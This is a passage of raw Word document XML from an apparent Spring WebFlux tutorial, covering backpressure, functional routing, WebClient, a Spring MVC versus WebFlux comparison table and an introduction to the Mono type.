          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publisher types</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Mono and Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F22AB3"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Great for composing asynchronous operations (e.g., chaining DB calls, API calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525CF66F" w14:textId="77777777" w:rsidR="00454E0F"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6B5080">
          <v:rect id="_x0000_i2216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366DF42" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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4. Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FC623"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Gracefully handles data overload by supporting </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which avoids memory overflows in high-load scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0FA6B" w14:textId="77777777" w:rsidR="00454E0F"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2FC1A96">
          <v:rect id="_x0000_i2217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A839C35" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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5. Supports Functional Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C8615"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In addition to annotation-based controllers, WebFlux supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49808B9A" w14:textId="77777777" w:rsidR="00454E0F"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C94CF65">
          <v:rect id="_x0000_i2218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637860B8" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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6. WebClient (Non-blocking HTTP client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C236184"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Replaces RestTemplate with WebClient, which is </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1460C34C" w14:textId="77777777" w:rsidR="00454E0F"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3E54CE6">
          <v:rect id="_x0000_i2219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30F2E1" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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7. Cloud-Native &amp; Microservices Friendly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E28B62"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Works great in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where scalability and reactive integration with DBs/APIs/message queues are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A3326" w14:textId="77777777" w:rsidR="00454E0F"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EC41375">
          <v:rect id="_x0000_i2220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03591F16" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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00"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="2212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1DF891A9" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0A4026" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D4BAB46" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AF6827C" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="7364B8A1" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F8C63A"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I/O Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D983FF"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Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A9C12E"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Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="495C1DBB" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A0BFE28"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39224688"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Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72F8AEF0"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="76A7255D" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DED622D"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Backpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46DC50FB"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D1B981C"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6C6E5E1E" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05514DA9"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Reactive Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1CFD07"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4223A499"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1BE082F0" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="611D8B40"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Suitable For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4573F4E2"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Traditional apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C866BC1" w14:textId="77777777" w:rsidR="00454E0F" w:rsidRPr="00372576" w:rsidRDefault="00454E0F"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Real-time/reactive apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA13DCB"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3D7F17C">
          <v:rect id="_x0000_i2221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC6718" w14:textId="5D05DC6C"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487" w:name="_Toc196307967"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Mono in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p w14:paraId="0D0A4A41" w14:textId="16FF9D7F" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a Mono&lt;T&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that represents </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a single (or no) value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> emitted asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF57BC" w14:textId="77777777" w:rsidR="004F1704"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FABF4DE">
          <v:rect id="_x0000_i2222" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365A302" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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What is Mono?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B6A26" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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It’s a part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the reactive library used by Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05943FA0" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono&lt;T&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from the Reactive Streams API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23598E81" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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It emits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCB93D" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Zero or One item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B32DA" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Then completes or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A98EF" w14:textId="77777777" w:rsidR="004F1704"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2DDBC91">
          <v:rect id="_x0000_i2223" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49C418" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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When to Use Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F49A32" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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When your method returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC42F6" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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One User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2531A632" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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One HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC182EF" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Acknowledgement (e.g., save operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C90290" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Or even nothing (like Mono&lt;Void&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08740BFB" w14:textId="77777777" w:rsidR="004F1704"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97F14C">
          <v:rect id="_x0000_i2224" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC6277" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Example: Basic Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A579A" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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GetMapping("/greet")</w:t>
      </w:r>
    </w:p>
